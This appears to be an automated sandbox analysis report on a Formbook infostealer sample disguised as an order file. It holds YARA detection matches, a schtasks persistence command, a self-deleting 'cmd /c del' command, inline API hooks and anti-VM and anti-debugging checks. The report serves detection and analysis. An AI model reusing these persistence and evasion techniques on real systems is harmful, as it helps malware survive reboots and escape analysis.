          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@1/1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile created: C:\Users\user\AppData\Roaming\EDclkRlYpO.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_01
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeMutant created: \Sessions\1\BaseNamedObjects\ugZrrYBXfdkAJqNUuDfJ
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile created: C:\Users\user\AppData\Local\Temp\tmp285B.tmpJump to behavior
          Source: Order 275594 04-D4E5A.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order 275594 04-D4E5A.exeMetadefender: Detection: 20%
          Source: Order 275594 04-D4E5A.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile read: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Order 275594 04-D4E5A.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order 275594 04-D4E5A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmp, svchost.exe, 00000017.00000003.362268250.0000000000D00000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 275594 04-D4E5A.exe, svchost.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeUnpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeUnpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00014732 push cs; retf 0_2_00014760
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00408A35 push ds; iretd 17_2_00408A38
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0040E41B push ds; ret 17_2_0040E43C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041CEB5 push eax; ret 17_2_0041CF08
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041CF6C push eax; ret 17_2_0041CF72
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041CF02 push eax; ret 17_2_0041CF08
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041CF0B push eax; ret 17_2_0041CF72
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00416FBF push esi; iretd 17_2_00416FC0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00E04732 push cs; retf 17_2_00E04760
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019CD0D1 push ecx; ret 17_2_019CD0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031BD0D1 push ecx; ret 23_2_031BD0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00358A35 push ds; iretd 23_2_00358A38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036D23C push cs; iretd 23_2_0036D250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0035E41B push ds; ret 23_2_0035E43C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036CEB5 push eax; ret 23_2_0036CF08
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036CF02 push eax; ret 23_2_0036CF08
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036CF0B push eax; ret 23_2_0036CF72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036CF6C push eax; ret 23_2_0036CF72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00366FBF push esi; iretd 23_2_00366FC0
          Source: initial sampleStatic PE information: section name: .text entropy: 7.11280635701
          Source: initial sampleStatic PE information: section name: .text entropy: 7.11280635701
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile created: C:\Users\user\AppData\Roaming\EDclkRlYpO.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: Order 275594 04-D4E5A.exe PID: 2024, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00409A90 rdtsc 17_2_00409A90
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe TID: 1832Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe TID: 6140Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000012.00000000.326027448.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000012.00000000.350549193.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.350583637.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00409A90 rdtsc 17_2_00409A90
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0040ACD0 LdrLoadDll,17_2_0040ACD0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A349A4 mov eax, dword ptr fs:[00000030h]17_2_01A349A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A349A4 mov eax, dword ptr fs:[00000030h]17_2_01A349A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A349A4 mov eax, dword ptr fs:[00000030h]17_2_01A349A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A349A4 mov eax, dword ptr fs:[00000030h]17_2_01A349A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2990 mov eax, dword ptr fs:[00000030h]17_2_019A2990
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199C182 mov eax, dword ptr fs:[00000030h]17_2_0199C182
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AA185 mov eax, dword ptr fs:[00000030h]17_2_019AA185
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F51BE mov eax, dword ptr fs:[00000030h]17_2_019F51BE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F51BE mov eax, dword ptr fs:[00000030h]17_2_019F51BE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F51BE mov eax, dword ptr fs:[00000030h]17_2_019F51BE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F51BE mov eax, dword ptr fs:[00000030h]17_2_019F51BE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov eax, dword ptr fs:[00000030h]17_2_019999BF
